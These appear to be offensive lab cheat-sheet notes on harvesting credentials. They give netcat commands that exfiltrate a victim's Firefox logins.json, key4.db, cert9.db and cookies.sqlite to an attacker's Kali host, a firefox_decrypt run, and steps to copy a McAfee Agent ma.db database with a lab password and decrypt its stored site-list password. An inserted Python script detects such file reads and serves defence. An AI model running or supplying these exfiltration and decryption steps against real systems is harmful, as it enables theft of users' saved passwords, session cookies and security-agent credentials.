Credential Harvesting

Browsers

Firefox

Common Areas

Location: C:\Users\$USER\AppData\Roaming\Mozilla\Firefox\Profiles\
Notes: Depending on the version of Firefox, there will be a folder with the files you need, e.g. ljfn812a.default-release = Firefox 75.0
Example: Gatekeeper

Exploit

Decrypt Credentials

Examples

Gatekeeper

Kali

We need to transfer the following files one by one.

nc -nlvp 1234 > logins.json
nc -nlvp 1234 > key4.db 
nc -nlvp 1234 > cert9.db 
nc -nlvp 1234 > cookies.sqlite

Victim

nc64.exe -nv $KALI 1234 < logins.json
nc64.exe -nv $KALI 1234 < key4.db 
nc64.exe -nv $KALI 1234 < cert9.db 
nc64.exe -nv $KALI 1234 < cookies.sqlite

Running firefox_decrypt against the transferred files will show any passwords saved in Firefox.

Kali

git clone https://github.com/unode/firefox_decrypt.git
python3.9 firefox_decrypt/firefox_decrypt.py ./
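
Seen from the defending side, the transfer above shows up as a process other than Firefox reading the profile's credential files. The check below is an added example, not part of the original notes: the event records are constructed and reduced to two hypothetical fields (process_name, object_name) of the kind Windows object-access auditing (event 4663) supplies, and the allow-list is an assumption to adjust per environment.

```python
import ntpath
import re

# The four profile files the page copies off the host.
SENSITIVE = {"logins.json", "key4.db", "cert9.db", "cookies.sqlite"}
# Matches <profile dir>\<file> directly under the Firefox Profiles folder.
PROFILE_RE = re.compile(
    r"\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\[^\\]+\\([^\\]+)$",
    re.IGNORECASE)
# Assumption: only Firefox itself is expected to open these files.
ALLOWED = {"firefox.exe"}

def suspicious_reads(events):
    """Return (process, file) pairs where a non-allow-listed process touched a credential file."""
    hits = []
    for ev in events:
        m = PROFILE_RE.search(ev["object_name"])
        if not m or m.group(1).lower() not in SENSITIVE:
            continue
        proc = ntpath.basename(ev["process_name"]).lower()
        if proc not in ALLOWED:
            hits.append((proc, m.group(1).lower()))
    return hits

def staged_collection(events, threshold=2):
    """Processes that touched at least `threshold` distinct credential files."""
    seen = {}
    for proc, name in suspicious_reads(events):
        seen.setdefault(proc, set()).add(name)
    return {p: sorted(f) for p, f in seen.items() if len(f) >= threshold}

# Constructed sample records (not real logs).
PROFILE = r"C:\Users\alice\AppData\Roaming\Mozilla\Firefox\Profiles\ljfn812a.default-release"
SAMPLE = [
    {"process_name": r"C:\Program Files\Mozilla Firefox\firefox.exe", "object_name": PROFILE + r"\logins.json"},
    {"process_name": r"C:\Users\alice\Downloads\nc64.exe", "object_name": PROFILE + r"\logins.json"},
    {"process_name": r"C:\Users\alice\Downloads\nc64.exe", "object_name": PROFILE + r"\key4.db"},
    {"process_name": r"C:\Windows\System32\notepad.exe", "object_name": PROFILE + r"\prefs.js"},
]

if __name__ == "__main__":
    print(staged_collection(SAMPLE))
```

Object-access events for these files are only produced when an audit SACL is set on the profile folder and file-system auditing is enabled.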

Configuration Files

McAfee Agent

Examples

Configuration Files

Victim

cd C:\ProgramData\McAfee\Agent\DB

Victim

scp thm@THMJMP1.za.tryhackme.com:C:/ProgramData/McAfee/Agent/DB/ma.db .
Password: Password1@

Kali

sqlitebrowser ma.db

Kali

cp /root/Rooms/BreachingAD/task7/mcafeesitelistpwddecryption.zip .
unzip mcafeesitelistpwddecryption.zip

Kali

python2 mcafee-sitelist-pwd-decryption-master/mcafee_sitelist_pwd_decrypt.py jWbTyS7BL1Hj7PkO5Di/QhhYmcGj5cOoZ2OkDTrFXsR/abAFPM9B3Q==
